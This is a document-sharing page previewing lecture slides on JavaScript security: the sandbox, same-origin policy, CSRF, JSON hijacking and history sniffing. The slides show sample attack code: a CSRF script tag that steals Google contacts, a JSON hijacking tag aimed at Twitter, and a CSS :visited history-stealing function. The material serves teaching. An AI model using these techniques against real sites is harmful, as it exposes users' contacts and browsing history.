Docsity
Docsity

Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity


Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan


Guidelines and tips
Guidelines and tips

Security - Introduction to Java Script - Lecture Slides, Slides of Javascript programming

Here is my collection on JavaScript lectures. It includes tutorials as well as general concepts explanations. Particularly these slides contain: Security, Javascript Sandbox, Malicious Web, Same Origin Policy, Javascript Global Object, Protecting Javascript, Cross-Site Scripting, Myspace, Cross-Site Request Forgery, Dns Attacks, Escape Output

Typology: Slides

2013/2014

Uploaded on 01/29/2014

surii
surii 🇮🇳

3.5

(13)

130 documents

1 / 41

Toggle sidebar

Related documents


Partial preview of the text

Download Security - Introduction to Java Script - Lecture Slides and more Slides Javascript programming in PDF only on Docsity!

JavaScript Security

Living in a powder keg and giving off sparks

  • JavaScript security is a mess
  • The security model is outdated
  • Key examples
  • Attacking DNS to attack JavaScript
  • What are we going to do?

The JavaScript Sandbox

  • JavaScript security dates to 1995
  • Two key concerns:
    • Stop a malicious web site from attacking your computer
    • Stop a malicious web site from interacting with another web site

The Death of the PC

  • If all your documents are in the cloud, what good is protecting your PC?
  • The JavaScript sandbox does nothing to prevent cloud attacks
  • Who cares if a web site is prevented from reading your “My Documents”: it’s empty

The Same Origin Policy

  • Scripts running on one page can’t interact with other pages
  • For example, scripts loaded by jgc.org can’t access virusbtn.com
  • But the Same Origin Policy doesn’t apply to the scripts themselves

  • Remote

<SCRIPT

SRC=“http://jgc.org/foo.js”>

Multiple

JavaScript Global Object

  • JavaScript is inherently a ‘global’ language
  • Variables have global scope
  • Functions have global scope
  • Objects inherit from a global object

Bad stuff you can do globally

  • Different scripts can mess with each other’s variables
  • Different scripts can redefine each other’s functions
  • Scripts can override native methods
  • Transmit data anywhere
  • Watch keystrokes
  • Steal cookies
  • All scripts run with equal authority

JavaScript is everywhere

  • -

Script Escalation

  • Scripts can load other scripts
  • Get a foothold and you can do anything

Cross-Site Request Forgery

  • Hijack cookies to use a session for bad purposes
  • Enhance with JavaScript for complex transactions.

CSRF Example: Google Mail

  • Steal authenticated user’s contact http://docs.google.com/data/contacts?out=js&sh ow=ALL&psort=Affinity&callback=google&max= 9 google ({ Success: true, Errors: [], Body: {…

CSRF Example: Google Mail

  • Full exploit

<script type="text/javascript"

src="http://docs.google.com/data/contacts?ou

t=js&show=ALL&psort=Affinity&callback=google

&max=99999">

JSON Hijacking

  • CSRF attack against JSON objects
  • Works by redefined the Object constructor in

JavaScript

<script defer="defer"

src=https://twitter.com/statuses

/friends_timeline/>

Stealing history with JavaScript and CSS

  • Use JavaScript to look at the ‘visited’ color of links function stealHistory() { for (var i = 0; i < websites.length; i++) { var link = document.createElement("a"); link.id = "id" + i; link.href = websites[i]; link.innerHTML = websites[i]; document.body.appendChild(link); var color = document.defaultView.getComputedStyle(link,null). getPropertyValue("color"); document.body.removeChild(link); if (color == "rgb(0, 0, 255)") { document.write('' + websites[i] + ''); }}}

Sandbox Holes

  • Sandbox not immune to actual security holes
  • Most recent was Google V8 JavaScript engine Google Chrome V8 JavaScript Engine Remote Code Execution Vulnerability Bugtraq: 36149